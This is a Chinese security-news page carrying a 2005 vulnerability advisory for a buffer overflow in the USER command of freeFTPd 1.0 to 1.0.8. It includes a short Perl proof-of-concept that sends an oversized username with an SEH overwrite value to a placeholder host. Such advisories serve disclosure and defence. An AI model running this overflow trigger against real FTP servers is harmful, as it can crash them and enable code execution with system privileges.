首页  新闻  文章  软件  动画  编程  设计  视频  搜黑  网址  网校  博客  论坛  邮箱  最近更新

漏洞公布  病毒公告  业界动态  黑客新闻  黑客人物  杀毒防护  安全书籍  升级补丁
入侵检测  漏洞研究  软件评测  操作系统  技巧知识  网管天地  黑客编程  Q Q 技巧  安全防护
扫描检测  远程监控  脚本注入  拒绝攻击  嗅探监听  木马后门  字典代理  密码破解  Q Q 软件
Q Q 动画  木马教程  脚本入侵  漏洞利用  加密破解  软件应用  安全配置  综合教程
Delphi编程  汇编编程  VB编程  VC/C++编程  PB编程  VFP编程  WEB编程  Exploite  数据库编程
黑客培训 2G防毒Email
·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 >> 新闻中心 >> 漏洞公布

FreeFTPD用户命令溢出漏洞

http://www.anqn.com     时间:2005-11-18 11:22:00      责任编辑:刘震宇      网友评论 
热 点:

受影响系统:
freeFTPd freeFTPd 1.0.8
freeFTPd freeFTPd 1.0.7
freeFTPd freeFTPd 1.0.6
freeFTPd freeFTPd 1.0.5
freeFTPd freeFTPd 1.0.4
freeFTPd freeFTPd 1.0.3
freeFTPd freeFTPd 1.0.2
freeFTPd freeFTPd 1.0.1
freeFTPd freeFTPd 1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 15457

FreeFTPd是一款基于WeOnlyDo FTP/SFTP实现的免费FTP+SSL/SFTP服务器。

由于没有正确的验证用户输入导致FreeFTPd中存在缓冲区溢出漏洞。成功利用这个漏洞的攻击者可以导致服务器崩溃,或以系统权限执行任意代码。

<*来源:mutsonline (barbsie@gmail.com)
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

my $ftp = Net::FTP->new("www.example.com <http://www.example.com>", Debug =>
1);
$ftp->login("$user","whatevah");

建议:
--------------------------------------------------------------------------------
厂商补丁:

freeFTPd
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://freeftpd.com/

·上一篇: Gmail存在巨大漏洞 Google隐瞒至今刚修复
·下一篇: Windows版iTunes存缺陷 黑客运行任意代码

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·SlimFTPd 微型FTP木马(枫叶网络汉化版) [2005-11-2]
·Unix软件ncftpd 2.7.1之破解 [2005-9-6]
·TFTPD32使用演示(含工具) [2005-8-27]
·穿越隔离墙传送利器Tftpd32 [2005-7-17]
·PureFTPd Accept_Client远程拒绝服务漏洞 [2004-12-29]
·ProFTPD CIDR访问控制规则绕过漏洞 [2005-7-10]
·Wu-ftpd S/key验证缓冲区溢出漏洞 [2005-7-10]
·Wu-ftpd目录限制访问绕过漏洞 [2005-7-10]